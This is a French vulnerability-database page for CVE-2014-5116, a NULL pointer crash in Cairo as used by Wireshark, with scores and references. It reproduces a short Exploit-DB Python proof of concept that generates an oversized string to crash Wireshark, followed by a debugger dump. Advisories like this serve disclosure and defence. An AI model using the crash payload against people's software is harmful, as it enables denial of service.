CVE-2014-5116 : Détail

CVE-2014-5116

6.26%V4
Network
2014-07-29
14h00 +00:00
2024-09-16
16h52 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The cairo_image_surface_get_data function in Cairo 1.10.2, as used in GTK+ and Wireshark, allows context-dependent attackers to cause a denial of service (NULL pointer dereference) via a large string.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 33384

Date de publication : 2014-05-15 22h00 +00:00
Auteur : Osanda Malith Jayathissa
EDB Vérifié : Yes

#!/usr/bin/python # Exploit Title: Wireshark Read Access Violation near NULL starting at libcairo_2!cairo_image_surface_get_data() # Date: May 15th 2014 # Author: Osanda Malith Jayathissa # E-Mail: osandajayathissa<[at]>gmail.com # Version: 1.10.7 32-bit and 64-bit # Vendor Homepage: http://www.wireshark.org # Tested on: Windows 8 64-bit ''' The issue is with the cairo_image_surface_get_data() function in Cairo. These fields are vulnerable: - Filter text box - Statistics -> IP DESTINATIONS - Statistics -> IP Addresses Paste the generated text in any one of above fields and hit return. ''' payload = "A" * 50000 file = open('exploit.txt', "w") file.write(payload) file.close() ''' *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Wireshark32\libcairo-2.dll - eax=00000000 ebx=052dabf0 ecx=77bc2ad2 edx=612fc6e0 esi=00000000 edi=612fc6e0 eip=61291737 esp=008cdca0 ebp=00000000 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 libcairo_2!cairo_image_surface_get_data+0x7: 61291737 8138609d2f61 cmp dword ptr [eax],offset libcairo_2!cairo_tee_surface_index+0xd080 (612f9d60) ds:002b:00000000=???????? '''

Products Mentioned

Configuraton 0

Cairographics>>Cairo >> Version 1.10.2

Références

http://www.exploit-db.com/exploits/33384
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.osvdb.org/107083
Tags : vdb-entry, x_refsource_OSVDB